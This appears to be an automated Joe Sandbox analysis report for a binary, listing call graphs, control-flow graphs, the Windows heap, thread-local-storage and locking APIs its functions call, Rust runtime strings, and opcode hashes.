12e6f7b 2233->2234 2235 12e6f19 2233->2235 2237 12dc380 78 API calls 2234->2237 2236 11bca40 78 API calls 2235->2236 2238 12e6f25 2236->2238 2239 12e6f8f 2237->2239 2238->2239 2241 12e6f2b 2238->2241 2240 12dc300 78 API calls 2239->2240 2242 12e6fac 2240->2242 2243 fb1220 RtlAllocateHeap GetProcessHeap HeapAlloc 2241->2243 2245 12e6fe7 2242->2245 2248 11a2260 HeapFree HeapFree 2242->2248 2244 12e6f41 2243->2244 2246 12e6f45 2244->2246 2247 12dbae0 78 API calls 2244->2247 2245->2140 2246->2140 2247->2242 2248->2245 2250 11b9d0d 2249->2250 2251 11b9d15 2249->2251 2252 11a2260 HeapFree HeapFree 2250->2252 2253 11b9d31 2251->2253 2254 11b9d22 HeapFree 2251->2254 2252->2251 2253->2144 2254->2253 2256 fb1293 RtlReAllocateHeap 2255->2256 2257 fb12a5 2255->2257 2258 fb1305 2256->2258 2259 fb12bf HeapAlloc 2257->2259 2260 fb12b0 GetProcessHeap 2257->2260 2258->2117 2259->2258 2262 fb12d1 2259->2262 2260->2258 2261 fb12ba 2260->2261 2261->2259 2263 fb12ef HeapFree 2262->2263 2263->2258 2265 11a2798 2264->2265 2266 11a26ef TlsGetValue 2264->2266 2267 12e6800 75 API calls 2265->2267 2269 11a26fc 2266->2269 2267->2266 2270 11a2719 TlsGetValue 2269->2270 2272 12e6800 75 API calls 2269->2272 2285 11a2704 2269->2285 2273 11a2726 2270->2273 2270->2285 2272->2270 2274 11a2767 2273->2274 2275 fb1220 3 API calls 2273->2275 2281 11a2260 2 API calls 2274->2281 2274->2285 2276 11a2742 2275->2276 2277 11a27c2 2276->2277 2278 11a2746 2276->2278 2280 12dbae0 75 API calls 2277->2280 2279 11a275e TlsSetValue 2278->2279 2283 12e6800 75 API calls 2278->2283 2279->2274 2284 11a27d1 2280->2284 2281->2285 2283->2279 2286 11a2802 2284->2286 2287 11a27f2 2284->2287 2285->1915 2304 fba170 2286->2304 2289 11a27f7 2287->2289 2309 fc03c0 2287->2309 2289->1915 2290 11a2809 2290->1915 2292 11a2814 2292->1915 2294 fb1220 3 API calls 2293->2294 2295 11a1bc7 2294->2295 2296 11a1c49 2295->2296 2297 11a1bce 2295->2297 2298 12dbae0 77 API calls 2296->2298 2300 11a1c16 2297->2300 2323 12e6a40 2297->2323 2302 11a1c47 2298->2302 2299 11a1ca0 2299->1918 2300->1918 2302->2299 2303 11a1c8f HeapFree 2302->2303 2303->2299 2305 fba190 2304->2305 2305->2305 2306 fba1c0 2305->2306 2320 12dbf20 2305->2320 2306->2290 2310 fc03e0 2309->2310 2310->2310 2311 fc0410 2310->2311 2312 12dbf20 78 API calls 2310->2312 2311->2292 2313 fc044e 2312->2313 2314 fc04bc 2313->2314 2315 12dbf20 78 API calls 2313->2315 2314->2292 2316 fc04fd 2315->2316 2317 fc056c 2316->2317 2318 12dbf20 78 API calls 2316->2318 2317->2292 2319 fc05ad 2318->2319 2319->2292 2321 12dbef0 78 API calls 2320->2321 2322 12dbf7f 2321->2322 2324 12dbef0 78 API calls 2323->2324 2328 12e6a76 2324->2328 2325 12e6afa 2326 fae560 78 API calls 2325->2326 2327 12e6aff 2326->2327 2327->2302 2328->2325 2342 11a4830 2328->2342 2331 12e6b0b 2332 12dbae0 78 API calls 2331->2332 2336 12e6b14 2332->2336 2333 12e6b90 2334 fae560 78 API calls 2333->2334 2335 12e6b95 2334->2335 2335->2302 2336->2333 2337 11a4830 7 API calls 2336->2337 2338 12e6b76 2337->2338 2338->2333 2338->2335 2339 12e6ba0 2338->2339 2340 12dbae0 78 API calls 2339->2340 2341 12e6ba9 2340->2341 2343 11a485d 2342->2343 2344 11a483d 2342->2344 2343->2325 2343->2327 2343->2331 2344->2343 2345 11a4875 2344->2345 2346 11a4854 2344->2346 2345->2343 2348 fb1220 3 API calls 2345->2348 2347 fb1280 4 API calls 2346->2347 2347->2343 2348->2343 2350 11be906 2349->2350 2352 11be87f 2349->2352 2351 12e6bb0 76 API calls 2350->2351 2351->2352 2353 11be8ea ReleaseSRWLockExclusive 2352->2353 2354 12e6bb0 76 API calls 2352->2354 2353->1931 2355 11be921 2354->2355 2355->2353 2357 11b1359 2356->2357 2358 12dc040 78 API calls 2357->2358 2359 11b1405 2358->2359 2361 11b1434 2359->2361 2364 11a6f30 2361->2364 2365 11a6f4e 2364->2365 2366 11a738d 2365->2366 2368 12dbfe0 78 API calls 2365->2368 2369 11a728f 2365->2369 2375 11a72ae 2365->2375 2367 12dbf20 78 API calls 2366->2367 2366->2375 2367->2369 2368->2366 2370 12dbf20 78 API calls 2369->2370 2373 11a73c9 2369->2373 2369->2375 2370->2373 2371 12dbf20 78 API calls 2372 11a752e 2371->2372 2376 11a7543 2372->2376 2373->2371 2373->2375 2378 11a7742 2376->2378 2385 11a7554 2376->2385 2377 11a7767 2377->2378 2379 12dbf20 78 API calls 2377->2379 2380 11a787a 2379->2380 2381 12dbfe0 78 API calls 2380->2381 2383 11a7888 2381->2383 2382 12dbf20 78 API calls 2382->2377 2384 12dbf20 78 API calls 2383->2384 2386 11a7659 2384->2386 2385->2377 2385->2378 2385->2382 2385->2386 2386->2378 2387 12dbf20 78 API calls 2386->2387 2388 11a78a7 2387->2388 2390 12e6470 2389->2390 2391 12e6695 2390->2391 2392 12e64a0 2390->2392 2393 12e66cc 2390->2393 2395 12e64c3 2390->2395 2398 12e64e7 TlsGetValue 2390->2398 2401 12e651d TlsGetValue 2390->2401 2403 12e6800 75 API calls 2390->2403 2405 12e6530 2390->2405 2406 fb1220 3 API calls 2390->2406 2407 11a1b80 75 API calls 2390->2407 2408 12e6734 2390->2408 2410 12e66dd 2390->2410 2411 12e6660 2390->2411 2413 11a2260 HeapFree HeapFree 2390->2413 2416 12e657b TlsSetValue 2390->2416 2394 12e66b7 2391->2394 2397 12dbef0 75 API calls 2392->2397 2393->1996 2438 11a20b0 2394->2438 2399 12dc040 75 API calls 2395->2399 2397->2395 2398->2390 2400 12e6798 2399->2400 2402 12e67b7 2400->2402 2404 11a2260 2 API calls 2400->2404 2401->2390 2402->1996 2403->2390 2404->2402 2452 12dc380 2405->2452 2406->2390 2407->2390 2412 12dbae0 75 API calls 2408->2412 2414 12dbef0 75 API calls 2410->2414 2417 11a22a0 2411->2417 2412->2392 2413->2390 2414->2405 2416->2390 2418 11a2420 76 API calls 2417->2418 2419 11a22d9 2418->2419 2420 11a238c 2419->2420 2421 11a22e1 2419->2421 2423 12dc380 76 API calls 2420->2423 2422 11a2314 2421->2422 2425 11a22fe 2421->2425 2426 11a2316 2421->2426 2424 11a237b 2422->2424 2428 11a2260 2 API calls 2422->2428 2427 11a23a0 2423->2427 2424->2390 2429 11a2300 WaitOnAddress 2425->2429 2426->2422 2433 11a2340 2426->2433 2434 11a23a5 2426->2434 2455 11a24f0 2427->2455 2428->2424 2429->2422 2429->2429 2433->2422 2435 11a2352 CloseHandle 2433->2435 2437 12dbef0 76 API calls 2434->2437 2435->2422 2437->2427 2449 11a2219 2438->2449 2450 11a20f0 2438->2450 2439 11a20f5 2439->2393 2441 11a21b8 2444 12dc040 77 API calls 2441->2444 2442 11a2238 2443 11a2257 2442->2443 2445 11a2260 2 API calls 2442->2445 2443->2393 2446 11a21d3 2444->2446 2445->2443 2448 12dbef0 77 API calls 2446->2448 2447 11a2260 2 API calls 2447->2450 2448->2449 2462 12e69c0 2449->2462 2450->2439 2450->2441 2450->2446 2450->2447 2451 11a2192 CloseHandle 2450->2451 2451->2450 2453 12dbef0 78 API calls 2452->2453 2454 12dc3cf 2453->2454 2456 11a1d20 2 API calls 2455->2456 2457 11a253a 2456->2457 2458 11a1e80 2 API calls 2457->2458 2459 11a254a GetModuleHandleA 2458->2459 2460 11a256f GetProcAddress 2459->2460 2461 11a257e 2459->2461 2460->2461 2463 12dc0b0 78 API calls 2462->2463 2464 12e69ee 2463->2464 2465 12e69fa 2464->2465 2466 12e6430 78 API calls 2464->2466 2465->2442 2467 12e6a3a 2466->2467 2467->2442 2468 fb1280 2469 fb1293 RtlReAllocateHeap 2468->2469 2470 fb12a5 2468->2470 2471 fb1305 2469->2471 2472 fb12bf HeapAlloc 2470->2472 2473 fb12b0 GetProcessHeap 2470->2473 2472->2471 2475 fb12d1 2472->2475 2473->2471 2474 fb12ba 2473->2474 2474->2472 2476 fb12ef HeapFree 2475->2476 2476->2471 2477 12e6430 2478 12e6470 2477->2478 2479 12e6695 2478->2479 2480 12e64a0 2478->2480 2481 12e66cc 2478->2481 2483 12e64c3 2478->2483 2486 12e64e7 TlsGetValue 2478->2486 2489 12e651d TlsGetValue 2478->2489 2491 12e6800 75 API calls 2478->2491 2493 12e6530 2478->2493 2494 fb1220 3 API calls 2478->2494 2495 11a1b80 75 API calls 2478->2495 2496 12e6734 2478->2496 2498 12e66dd 2478->2498 2499 12e6660 2478->2499 2501 11a2260 HeapFree HeapFree 2478->2501 2504 12e657b TlsSetValue 2478->2504 2482 12e66b7 2479->2482 2485 12dbef0 75 API calls 2480->2485 2484 11a20b0 75 API calls 2482->2484 2487 12dc040 75 API calls 2483->2487 2484->2481 2485->2483 2486->2478 2488 12e6798 2487->2488 2490 12e67b7 2488->2490 2492 11a2260 2 API calls 2488->2492 2489->2478 2491->2478 2492->2490 2497 12dc380 75 API calls 2493->2497 2494->2478 2495->2478 2500 12dbae0 75 API calls 2496->2500 2497->2496 2502 12dbef0 75 API calls 2498->2502 2503 11a22a0 75 API calls 2499->2503 2500->2480 2501->2478 2502->2493 2503->2478 2504->2478 2505 12d6992 2508 12d7420 2505->2508 2507 12d6997 2507->2507 2509 12d7436 2508->2509 2511 12d743f 2509->2511 2512 12d73d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2509->2512 2511->2507 2512->2511

                                                                            Callgraph

                                                                            • Executed
                                                                            • Not Executed
                                                                            • Opacity -> Relevance
                                                                            • Disassembly available
                                                                            callgraph 0 Function_00FBA170 1 Function_012DBF20 0->1 40 Function_00FB8030 0->40 54 Function_00FB2D20 0->54 57 Function_012DBEF0 1->57 2 Function_012D7420 73 Function_012D73D3 2->73 3 Function_00FC15E9 50 Function_00FB1220 3->50 68 Function_00FB1280 3->68 4 Function_011A1E80 5 Function_00FAE560 5->57 6 Function_011A1B80 42 Function_012DBAE0 6->42 6->50 64 Function_012E6A40 6->64 7 Function_011B9D00 66 Function_011A2260 7->66 8 Function_012DC0B0 8->57 9 Function_012E6430 9->6 11 Function_011A20B0 9->11 22 Function_012DC380 9->22 25 Function_012E6800 9->25 30 Function_011A22A0 9->30 9->42 9->50 9->57 62 Function_012DC040 9->62 9->66 10 Function_012E6BB0 10->9 21 Function_012DC300 10->21 49 Function_011A3BC0 10->49 11->57 11->62 63 Function_012E69C0 11->63 11->66 12 Function_011A4830 12->50 12->68 13 Function_011A6F30 13->1 41 Function_012DBFE0 13->41 48 Function_011A7543 13->48 14 Function_00FB3250 15 Function_00FB41D0 16 Function_011B1330 17 Function_011BE830 17->10 18 Function_011BEA30 33 Function_011BEB20 18->33 19 Function_011C0230 19->7 19->19 19->25 31 Function_011BDE20 19->31 19->42 44 Function_012E6EE0 19->44 19->50 20 Function_012DC200 20->57 21->57 22->57 23 Function_012DBF80 23->57 24 Function_012E6980 24->8 25->24 25->57 74 Function_012E6950 25->74 26 Function_011B1434 26->13 27 Function_012D801A 28 Function_011A1D20 28->15 29 Function_011A2420 29->6 29->57 65 Function_011A26E0 29->65 30->22 30->29 30->57 59 Function_011A24F0 30->59 30->66 31->28 32 Function_00FB1340 32->20 32->23 32->41 45 Function_012DBCFF 32->45 56 Function_011C0240 32->56 60 Function_012D7940 32->60 33->4 33->10 33->16 33->21 33->28 33->29 47 Function_0107D250 33->47 33->49 55 Function_011B1340 33->55 33->66 67 Function_011AFDE0 33->67 70 Function_011BDF60 33->70 34 Function_011BEA20 34->18 35 Function_00FC03C0 35->1 35->54 36 Function_012D6992 36->2 37 Function_011A7925 37->27 38 Function_00FAE630 38->50 39 Function_00FB2D30 39->14 41->57 42->3 42->5 42->8 42->16 42->32 42->38 42->42 42->50 42->57 71 Function_011BE9E0 42->71 43 Function_012DC460 58 Function_012DC470 43->58 44->21 44->22 44->29 44->42 44->50 52 Function_011BCA40 44->52 44->66 45->3 45->5 45->8 45->16 45->42 45->50 45->57 45->71 46 Function_011B134F 46->26 46->62 48->1 48->37 48->41 49->25 49->42 49->50 51 Function_011B9D40 51->43 51->57 52->22 52->25 52->42 52->50 52->57 53 Function_00FB2C20 53->54 54->39 55->46 56->7 56->19 56->25 56->42 56->44 56->50 57->71 58->8 58->57 72 Function_012DC3D0 58->72 59->4 59->28 61 Function_012DC540 69 Function_00FBB200 61->69 62->8 62->57 63->8 63->9 64->5 64->12 64->42 64->57 65->0 65->25 65->35 65->42 65->50 65->53 65->66 67->25 67->42 67->47 67->50 68->60 69->20 69->57 69->61 69->62 70->17 71->34 71->62 72->43 72->71 74->8

                                                                            Executed Functions

                                                                            Function 00FB1220 Relevance: 4.5, APIs: 3, Instructions: 39memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 110 fb1220-fb122d 111 fb122f-fb1232 110->111 112 fb1240-fb1248 GetProcessHeap 110->112 113 fb1254-fb1262 HeapAlloc 111->113 114 fb1234-fb123e RtlAllocateHeap 111->114 115 fb124a-fb1252 112->115 116 fb1275 112->116 113->116 118 fb1264-fb1273 113->118 117 fb1279-fb127b 114->117 115->113 115->114 119 fb1277 116->119 118->119 119->117
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00FB1238
                                                                            • GetProcessHeap.KERNEL32(?,?,012E6556,?,?,?,?,?,?,?,?,?,?), ref: 00FB1240
                                                                            • HeapAlloc.KERNEL32(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00FB125A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocAllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 884036251-0
                                                                            • Opcode ID: 73ff38f242743b39a9d2804785fce9c5fe7f8a5c382eefa718c69c3dbd8472b9
                                                                            • Instruction ID: 40c27f5fa0e2b69ada2d7d07ba2f053f514d9b31dc4bc23709ec0f7be954b313
                                                                            • Opcode Fuzzy Hash: 73ff38f242743b39a9d2804785fce9c5fe7f8a5c382eefa718c69c3dbd8472b9
                                                                            • Instruction Fuzzy Hash: 36F0BB32B0421157DF384A3ABC2DBDB6BD8B786760B55042DF416D7294EA74CC049B54
                                                                            Function 011B9D40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memorythreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • SetThreadStackGuarantee.KERNELBASE(?), ref: 011B9D78
                                                                            • GetLastError.KERNEL32 ref: 011B9D82
                                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 011B9DCB
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011B9DDC
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011B9E6D
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 011B9E7E
                                                                            Strings
                                                                            • chunk size must be non-zero, xrefs: 011B9E14
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap$ErrorGuaranteeLastStackThread
                                                                            • String ID: chunk size must be non-zero
                                                                            • API String ID: 3680998240-1054586041
                                                                            • Opcode ID: 08ece91d9a1f071f6786d955e97d099a57e3d9e8d2a1ad0afc96d1b9fe4b205f
                                                                            • Instruction ID: f016988aa2b704e41de49525eda259e7396e2a25c0ab8bc4f41e270a3d3dea18
                                                                            • Opcode Fuzzy Hash: 08ece91d9a1f071f6786d955e97d099a57e3d9e8d2a1ad0afc96d1b9fe4b205f
                                                                            • Instruction Fuzzy Hash: D34139B5900208DFDB15DF98E888BDDBBF5FB08718F108019E914AB2A0D375A949CF94
                                                                            Function 012E6430 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 220COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 18 12e6430-12e6464 19 12e6475-12e647a 18->19 20 12e648f-12e6493 19->20 21 12e6495-12e6498 20->21 22 12e6480-12e6489 20->22 24 12e649a-12e649e 21->24 25 12e64b0-12e64b3 21->25 22->20 23 12e6695-12e66b1 22->23 29 12e66b7-12e66c7 call 11a20b0 23->29 24->22 26 12e64a0 24->26 27 12e66cc-12e66dc 25->27 28 12e64b9-12e64c1 25->28 30 12e674a-12e677a call 12dbef0 26->30 31 12e64da-12e64e1 28->31 32 12e64c3 28->32 29->27 34 12e677f-12e67ad call 12dc040 30->34 36 12e6618-12e6629 call 12e6800 31->36 37 12e64e7-12e64f2 TlsGetValue 31->37 32->34 47 12e67af-12e67b2 call 11a2260 34->47 48 12e67b7-12e67bb 34->48 45 12e662e-12e663f call 12e6800 36->45 39 12e64f4-12e64fa 37->39 40 12e6510-12e6517 37->40 39->40 44 12e64fc-12e64ff 39->44 40->45 46 12e651d-12e6527 TlsGetValue 40->46 49 12e65b0-12e65b4 44->49 67 12e6644-12e6655 call 12e6800 45->67 51 12e6529-12e652e 46->51 52 12e6540-12e6551 call fb1220 46->52 47->48 54 12e65cf-12e65d2 49->54 55 12e65b6-12e65c7 call 11a1b80 49->55 57 12e6583-12e659b 51->57 58 12e6530 51->58 64 12e6556-12e6558 52->64 62 12e65d8-12e65f3 54->62 63 12e6717 54->63 74 12e66dd-12e6712 call 12dbef0 55->74 75 12e65cd 55->75 57->49 65 12e659d-12e659f 57->65 61 12e6719-12e672f call 12dc380 58->61 71 12e6734-12e6745 call 12dbae0 61->71 68 12e666c-12e6672 62->68 69 12e65f5-12e65fc 62->69 63->61 70 12e655e-12e6574 64->70 64->71 65->49 73 12e65a1-12e65a4 65->73 89 12e657b-12e657d TlsSetValue 67->89 80 12e6674-12e6679 68->80 81 12e6660-12e6667 call 11a22a0 68->81 77 12e6602-12e6605 69->77 78 12e64d0-12e64d8 69->78 70->67 79 12e657a 70->79 71->30 73->49 83 12e65a6-12e65ab call 11a2260 73->83 74->63 75->54 77->78 88 12e660b-12e6613 call 11a2260 77->88 78->31 91 12e6470-12e6473 78->91 79->89 90 12e667f-12e6682 80->90 80->91 81->68 83->49 88->78 89->57 90->91 94 12e6688-12e6690 call 11a2260 90->94 91->19 94->91
                                                                            Strings
                                                                            • chunk size must be non-zero, xrefs: 012E66FA, 012E6765
                                                                            • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 012E6720
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: chunk size must be non-zero$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                            • API String ID: 0-991767630
                                                                            • Opcode ID: 697cc5a2e74f4c5e98be0a4c47df8675c3873dadc2bd563f524dccd25acd877c
                                                                            • Instruction ID: 86566d5d15afa405c81cc788e7442885d114109a7f1e57a86da36e348ad02808
                                                                            • Opcode Fuzzy Hash: 697cc5a2e74f4c5e98be0a4c47df8675c3873dadc2bd563f524dccd25acd877c
                                                                            • Instruction Fuzzy Hash: F391F3B1A2021A8FDF25DFA8D8483AEBBF1FF24324F544219D624AB3D5D7749801CB90
                                                                            Function 00FB1280 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 98 fb1280-fb1291 99 fb1293-fb12a3 RtlReAllocateHeap 98->99 100 fb12a5-fb12ae 98->100 101 fb1309-fb130d 99->101 102 fb12bf-fb12cf HeapAlloc 100->102 103 fb12b0-fb12b8 GetProcessHeap 100->103 105 fb1305 102->105 106 fb12d1-fb1303 call 12d7940 HeapFree 102->106 104 fb12ba 103->104 103->105 104->102 108 fb1307 105->108 106->108 108->101
                                                                            APIs
                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00000000,?,011A485D,00000000,?,?,00000004,?,012E6AE0,00000000), ref: 00FB129D
                                                                            • GetProcessHeap.KERNEL32(?,?,00000000,?,011A485D,00000000,?,?,00000004,?,012E6AE0,00000000), ref: 00FB12B0
                                                                            • HeapAlloc.KERNEL32(00920000,00000000,?,?,?,00000000,?,011A485D,00000000,?,?,00000004,?,012E6AE0,00000000), ref: 00FB12C7
                                                                            • HeapFree.KERNEL32(00000000,?), ref: 00FB12FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_f90000_888.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocAllocateFreeProcess
                                                                            • String ID:
                                                                            • API String ID: 3553877500-0
                                                                            • Opcode ID: 3f723509a33b035fb177e78b986216a583bd15c986a95e07f3854edd932308de
                                                                            • Instruction ID: d49aa1b3537a3ed7c892cacb5828ca78181fab1b150fc8dc67f62ce795549b5b
                                                                            • Opcode Fuzzy Hash: 3f723509a33b035fb177e78b986216a583bd15c986a95e07f3854edd932308de
                                                                            • Instruction Fuzzy Hash: 2901D272704201AFD7209F66FC8CBAB7BE8FB85354F550138F405D3654EBB498089BA0

                                                                            Non-executed Functions

                                                                            Function 011BEB20 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 418COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 163 11beb20-11beb71 164 11bf072-11bf0ee call 11a1d20 163->164 165 11beb77-11beb82 call 11a3bc0 163->165 172 11bf138-11bf165 call 11a1e80 164->172 170 11beba1-11beba5 165->170 171 11beb84-11beb9c call 12dc300 165->171 174 11bebab-11bebf5 AcquireSRWLockShared 170->174 175 11bf0f0-11bf135 call 11a1d20 170->175 171->170 181 11bf171-11bf179 172->181 182 11bf167-11bf16a 172->182 177 11bebfb-11bec21 174->177 178 11bed49-11bed7a 174->178 175->172 188 11bedcc-11beddd call 11a3bc0 177->188 189 11bec27-11bec74 177->189 192 11bed7d-11bed9d ReleaseSRWLockShared call 11a3bc0 178->192 182->181 184 11bf16c call 11a2260 182->184 184->181 196 11bee79-11bee7c 188->196 197 11bede3-11bee07 call 12dc300 188->197 198 11bec7a-11beca1 call 11a2420 189->198 199 11bee0c-11bee4c 189->199 205 11beda3-11bedc7 call 12dc300 192->205 206 11bee61-11bee69 192->206 201 11bee7e 196->201 202 11beee5-11beef4 call 11b1340 196->202 214 11bf02e 197->214 215 11becb3-11becda 198->215 216 11beca3-11beca8 198->216 218 11bef3b-11bef40 199->218 219 11bee52-11bee5a 199->219 212 11bee87-11beee3 call 11a1d20 call 11a1e80 201->212 220 11beefc-11bef14 call 11afde0 202->220 205->214 211 11bee6b-11bee74 call 11b1330 206->211 206->212 211->214 212->202 225 11bf030-11bf045 call 12e6bb0 214->225 215->220 221 11bece0-11bed1c call 11bdf60 215->221 216->215 226 11becaa-11becb2 216->226 230 11bef4a-11bef54 218->230 219->206 220->230 242 11bef16-11bef36 call 12dc300 220->242 240 11bed28-11bed2f 221->240 241 11bed1e-11bed21 221->241 238 11befcd-11befee ReleaseSRWLockExclusive call 11afde0 225->238 239 11bf047-11bf04e 225->239 226->215 230->221 235 11bef5a-11bef74 AcquireSRWLockExclusive 230->235 243 11bef7f-11bef97 call 12e6bb0 235->243 244 11bef76-11bef7d 235->244 259 11bf053-11bf05e 238->259 260 11beff0-11beff6 238->260 239->238 240->192 249 11bed31-11bed34 240->249 241->240 247 11bed23 call 11a2260 241->247 242->214 250 11bef9a-11befbf call 11bdf60 243->250 244->250 247->240 249->192 256 11bed36-11bed47 call 107d250 249->256 250->238 262 11befc1-11befcb 250->262 256->192 263 11bf06a 259->263 264 11bf060-11bf063 259->264 265 11beff8-11beffb call 107d250 260->265 266 11bf000-11bf02b call 12dc300 260->266 262->225 262->238 263->164 264->263 268 11bf065 call 107d250 264->268 265->266 266->214 268->263
                                                                            APIs
                                                                              • Part of subcall function 011A3BC0: TlsGetValue.KERNEL32(00000000,?,011BEB80), ref: 011A3BD0
                                                                            • AcquireSRWLockShared.KERNEL32(0141F9F4), ref: 011BEBDE
                                                                            • ReleaseSRWLockShared.KERNEL32(0141F9F4), ref: 011BED82
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 011BEFD0
                                                                              • Part of subcall function 011A2260: HeapFree.KERNEL32(00000000,00000000,?,011BF171), ref: 011A227C
                                                                              • Part of subcall function 011A2260: HeapFree.KERNEL32(00000000,?,?,011BF171), ref: 011A2296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2711833412.0000000000F91000.00000020.00000001.01000000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                            • Associated: 00000000.00000002.2711803042.0000000000F90000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.00000000012EA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712079371.0000000001339000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712217704.000000000141B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712249437.000000000141E000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712279862.000000000141F000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2712310372.0000000001421000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
